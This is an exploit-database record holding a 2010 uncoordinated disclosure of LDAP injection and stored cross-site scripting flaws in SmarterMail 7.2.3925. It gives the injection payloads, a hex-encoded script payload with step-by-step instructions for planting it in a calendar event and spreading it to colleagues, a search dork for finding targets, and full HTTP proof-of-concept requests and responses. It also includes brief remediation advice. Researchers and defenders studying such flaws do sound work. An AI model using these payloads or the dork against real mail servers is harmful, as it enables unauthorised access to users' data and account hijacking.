Exploit for php platform in category web applications
{"id": "1337DAY-ID-14318", "type": "zdt", "bulletinFamily": "exploit", "title": "SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2010-10-03T00:00:00", "modified": "2010-10-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/14318", "reporter": "sqlhacker", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-12T03:50:09", "viewCount": 10, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2010-3486"]}]}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/14318", "sourceData": "=======================================================\r\nSmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability\r\n=======================================================\r\n\r\n########################################################################\r\n# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)\r\n# Date: 2010-10-01\r\n# Author : David Hoyt (sqlhacker) \u2013 Hoyt LLC\r\n# Contact : [email\u00a0protected]\r\n# Home : http://cloudscan.me\r\n# Dork : insite: SmarterMail Enterprise 7.2\r\n# Bug : LDAP Injection + Cross Site Scripting (STORED)\r\n# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2\r\n# Uncoordinated Disclosure\r\n########################################################################\r\n \r\nABSTRACT\r\n--------------------------\r\nIt is important for application developers to penetration test\r\ntheir products prior to release in order to find potential vulnerabilities\r\nand correct them before fraudsters exploit them.\r\n \r\nDISCLOSURE PURPOSE\r\n--------------------------\r\nApplications for wide-scale deployment must be delivered with an exploit\r\nsurface that is manageable.\r\n \r\nDevelopers failing to 
properly screen applications prior to release are at\r\nrisk of uncoordinated disclosure.\r\n \r\nSECURITY COMMENTS\r\n--------------------------\r\nServer Application developers should explicitly be detailing the exploit\r\nsurface\r\nmodeling performed on an application as part of the software development\r\nlifecycle\r\nprior to and as part of a candidate release.\r\n \r\nSystem Admins need to take a trust-no-one approach when installing Server\r\nand Client Applications for wide-scale deployment.\r\n \r\nENGAGEMENT TOOLS\r\n--------------------------\r\nI am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,\r\nNeXpose, XSS_Rays,\r\nFuzzDB as a baseline set of engagement tools that are being used to perform\r\nthis analysis.\r\n \r\nThis is manual testing.\r\n \r\nDISCUSSION AND ANALYSIS\r\n--------------------------\r\nSmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have\r\naddressed a number of\r\nissues identified in CVEs\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425\r\nand\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486\r\n \r\nThere were a number of Private Advisories provided to Hoyt LLC Clients that\r\nwere not disclosed to the public. 
It was our assumption that\r\nthe level of detail and specificity would have resulted in a thorough\r\nscrubbing of any patches and release candidates.\r\n \r\nThere are additional exploits to disclose that use a manual, multi-step\r\nprocess to confirm with picture proof.\r\n \r\nThis advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS\r\nInjection vulnerabilities found in SmarterMail 7.x (7.2.3925).\r\nAdditional advisories will be released as we develop a bulletproof audit\r\ntrail.\r\n \r\nFurther advisories will focus on security by obscurity in SmarterMail.\r\n \r\nMy prior work focused on the URL/Parameter Combos that would deliver a Cross\r\nSite Scripting (STORED) exploit.\r\n \r\nMy review seeks to focus on the identified URL/Param combos in SmarterMail\r\n7.1 that were found to be vulnerable but not disclosed to the public\r\nand only available in private advisories to our clients and partners.\r\n \r\n \r\nAUDIT TRAIL + EXPLOIT PATTERN EXAMPLES\r\n \r\n \r\nEXPLOIT #1\r\n--------------------------\r\nLDAP injection and resulting STORED Cross Site Scripting in Events Planner -\r\nSmarterMail 7.x (7.2.3925)\r\n \r\nSummary\r\nSeverity: High\r\nConfidence: Certain\r\nHost: http://vulnerable.smartermail.site:9998\r\nPath: /Main/frmEmptyPreviewOuter.aspx\r\n Multiple Related URL/Parameters (available in private advisory)\r\n \r\nIssue detail\r\nThe type parameter is vulnerable to LDAP injection attacks.\r\n \r\nThe payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each\r\nsubmitted in the type parameter. These two requests resulted in different\r\nresponses, indicating that the input may be being incorporated into a\r\ndisjunctive LDAP query in an unsafe manner.\r\n \r\nIssue Background\r\n-----------------------\r\nLDAP injection arises when user-controllable data is copied in an unsafe way\r\ninto an LDAP query that is performed by the application. 
If an attacker can\r\ninject LDAP metacharacters into the query, then they can interfere with the\r\nquery's logic. Depending on the function for which the query is used, the\r\nattacker may be able to retrieve sensitive data to which they are not\r\nauthorised, or subvert the application's logic to perform some unauthorised\r\naction.\r\n \r\nNote that automated difference-based tests for LDAP injection flaws can\r\noften be unreliable and are prone to false-positive results.\r\n \r\nThe author has manually reviewed the reported requests and responses and\r\nconfirmed a vulnerability is present.\r\n \r\nAll the work presented is manual recon and analysis using the tools listed.\r\n \r\n \r\nStep by Step Process\r\n---------------------------------------------------\r\n \r\nThe steps to create the exploit are as follows:\r\n \r\n-Obtain an end-user SmarterMail 7.x (7.2.3925)\r\n-Log in to WebMail, Click Events\r\n \r\nNote - The XSS attack payload can be delivered by creating an Event Group or\r\nan Event Name.\r\n \r\nMy example will create a new event. I know that SmarterMail does some data\r\nsanitization, so I need to test various encoding schemes to get around the\r\nlimited sanity checking.\r\n \r\nTo make this easy to follow along, use URL http://ha.ckers.org/xss.html for\r\nour encoding calculator so the average Joe can leverage this exploit\r\nexample.\r\n \r\nI want to make a simple test to confirm if the URL/Parameters are vulnerable\r\nin the Event Planner of SmarterMail 7.x (7.2.3925).\r\nI'll use a known malicious payload example. 
Using the encoding calculator, I\r\ninput <\\\\\\/script>alert(0x000170)<\\\\/script>\r\nand for the HEX Value Stored Cross Site Scripting exploit I want to create.\r\n \r\nThe result is\r\n%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E,\r\nthere is your example exploit for Stored XSS.\r\n \r\nTake the result and paste it into the new event name (exploit) you want to\r\ncreate and e-mail around to all your colleagues and friends and blog about...\r\n \r\nClick submit and refresh the screen, here is what I \"received\" for a\r\npayload. I provide 2 examples of URL/Parameter manipulation that result in\r\nan event being created.\r\n \r\n** Author Note.. the Blogger parser isn't very good about making me escape\r\nthe nasty XSS below.. so I have to edit the post so readers don't get\r\nXSS'd.. Pictures are a part of the exploit surface model, I also like to\r\npost conclusive, picture proof of an exploit.\r\n \r\nThe picture(s) below provide conclusive evidence of Cross Site Scripting\r\n(STORED) delivered via LDAP Injection.\r\n \r\n \r\nStored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x\r\n(7.2.3925)\r\nLDAP Injection to leverage an XSS attack utilizing the event planner\r\nfeatures of SmarterMail 7.x (7.2.3925)\r\n \r\n \r\nStored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x\r\n(7.2.3925)\r\nLDAP Injection to leverage an XSS attack utilizing the event planner\r\nfeatures of SmarterMail 7.x (7.2.3925)\r\n \r\nThe implication here is that SmarterMail isn't defending against HEX Value\r\nmalicious payloads. 
This is a \"critical\" exploit finding confirmed in\r\nSmarterMail 7.x (7.2.3925).\r\nYou can keep testing with Decimal or Base 64 and produce results equal to\r\nand likely greater than what I am showing here in public, emphasis on\r\ngreater than what I am showing.\r\n \r\n \r\nIssue Remediation\r\n-------------------\r\nIf possible, applications should avoid copying user-controllable data into\r\nLDAP queries. If this is unavoidable, then the data should be strictly\r\nvalidated to prevent LDAP injection attacks. In most situations, it will be\r\nappropriate to allow only short alphanumeric strings to be copied into\r\nqueries, and any other input should be rejected. At a minimum, input\r\ncontaining any LDAP metacharacters should be rejected; characters that\r\nshould be blocked include ( ) ; , * | & = and whitespace.\r\n \r\n \r\nEXPLOIT Proof of Concept {PoC} - DETAILS\r\n--------------------------------------------\r\n \r\nRequest 1\r\nGET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1\r\nAccept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,\r\napplication/x-ms-application, application/x-ms-xbap,\r\napplication/vnd.ms-xpsdocument, application/xaml+xml, */*\r\nReferer: http://vulnerable.smartermail.site:9998/Default.aspx\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;\r\nTrident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nAccept-Encoding: gzip, deflate\r\nHost: vulnerable.smartermail.site:9998\r\nProxy-Connection: Keep-Alive\r\nCookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;\r\nsettings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;\r\nSTTTState=;\r\nSTHashCookie={\"CountsGuid\":\"1085934378\",\"TopBarSection\":\"UserContacts\"}\r\n \r\n \r\n \r\nResponse 1\r\nHTTP/2.0 200 OK\r\nServer: SmarterTools/2.0.3925.24451\r\nDate: Fri, 01 Oct 2010 22:28:00 GMT\r\nX-AspNet-Version: 2.0.50727\r\nX-Compressed-By: 
HttpCompress\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nConnection: Close\r\nContent-Length: 5204\r\n \r\n \r\n...[SNIP]...\r\n<![CDATA[\r\nUpdateSidebarCounts('UserSync', 0);\r\n$(function() { if (parent.UpdateCurrentPage)\r\nparent.UpdateCurrentPage('\\x2fMain\\x2ffrmEmptyPreviewOuter\\x2easpx?type\\x3d5faa0382d747b754\\x29\\x28sn\\x253d\\x2a');\r\n});\r\nSys.Application.initialize();\r\n$(function() {\r\nSetTopTitle('No\\x20item\\x20has\\x20been\\x20selected\\x20\\x2d\\x20hoytllc\\x2ecom\\x20\\x2d\\x20SmarterMail');\r\n});\r\n//]]>\r\n</script>\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\n \r\nRequest 2\r\nGET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1\r\nAccept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,\r\napplication/x-ms-application, application/x-ms-xbap,\r\napplication/vnd.ms-xpsdocument, application/xaml+xml, */*\r\nReferer: http://vulnerable.smartermail.site:9998/Default.aspx\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;\r\nTrident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nAccept-Encoding: gzip, deflate\r\nHost: vulnerable.smartermail.site:9998\r\nProxy-Connection: Keep-Alive\r\nCookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;\r\nsettings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;\r\nSTTTState=;\r\nSTHashCookie={\"CountsGuid\":\"1085934378\",\"TopBarSection\":\"UserContacts\"}\r\n \r\n \r\n \r\nResponse 2\r\nHTTP/2.0 200 OK\r\nServer: SmarterTools/2.0.3925.24451\r\nDate: Fri, 01 Oct 2010 22:28:00 GMT\r\nX-AspNet-Version: 2.0.50727\r\nX-Compressed-By: HttpCompress\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nConnection: Close\r\nContent-Length: 5247\r\n \r\n \r\n...[SNIP]...\r\n<![CDATA[\r\nUpdateSidebarCounts('UserEmail', 0);\r\nUpdateSidebarCounts('UserSync', 0);\r\n$(function() { if 
(parent.UpdateCurrentPage)\r\nparent.UpdateCurrentPage('\\x2fMain\\x2ffrmEmptyPreviewOuter\\x2easpx?type\\x3d5faa0382d747b754\\x29\\x21\\x28sn\\x253d\\x2a');\r\n});\r\nSys.Application.initialize();\r\n$(function() {\r\nSetTopTitle('No\\x20item\\x20has\\x20been\\x20selected\\x20\\x2d\\x20hoytllc\\x2ecom\\x20\\x2d\\x20SmarterMail');\r\n});\r\n//]]>\r\n \r\n \r\n \r\nEXPLOIT #2\r\n--------------------------\r\nDirectory Creation by Fuzzing that results in a STORED Cross Site Scripting\r\nattack.\r\n \r\nThis portion of the research focused on creating directories that would evade\r\nthe current filtering techniques used by SmarterMail to prevent OS Injection.\r\n \r\n \r\n \r\nWORKAROUNDS\r\n--------------------------\r\nSpecifically, URL filtering should be employed against the malicious query\r\nstrings.\r\n \r\n \r\n \r\nREMEDIATION SOLUTION\r\n------------------------\r\n \r\nI'm pushing a quick update to my clients now on this LDAP Injection / Stored\r\nXSS issue..\r\nOur group is studying a remediation solution or additional workarounds that\r\nwill be posted at this URL.\r\n \r\nCalendar and Event functionality is not straightforward to implement\r\nsecurely.\r\nSome recommendations to consider in the design of this functionality\r\ninclude:\r\n \r\nValidating Input and a blacklist of strings to hinder this style of attack.\r\n \r\nThere is more to the story.. since I'm just screening applications for\r\nclients, I am pushing out the info as I confirm it manually.\r\n\r\n\n\n# 0day.today [2018-04-12] #", "_state": {"dependencies": 1659889451, "score": 1659766679, "epss": 1678811959}}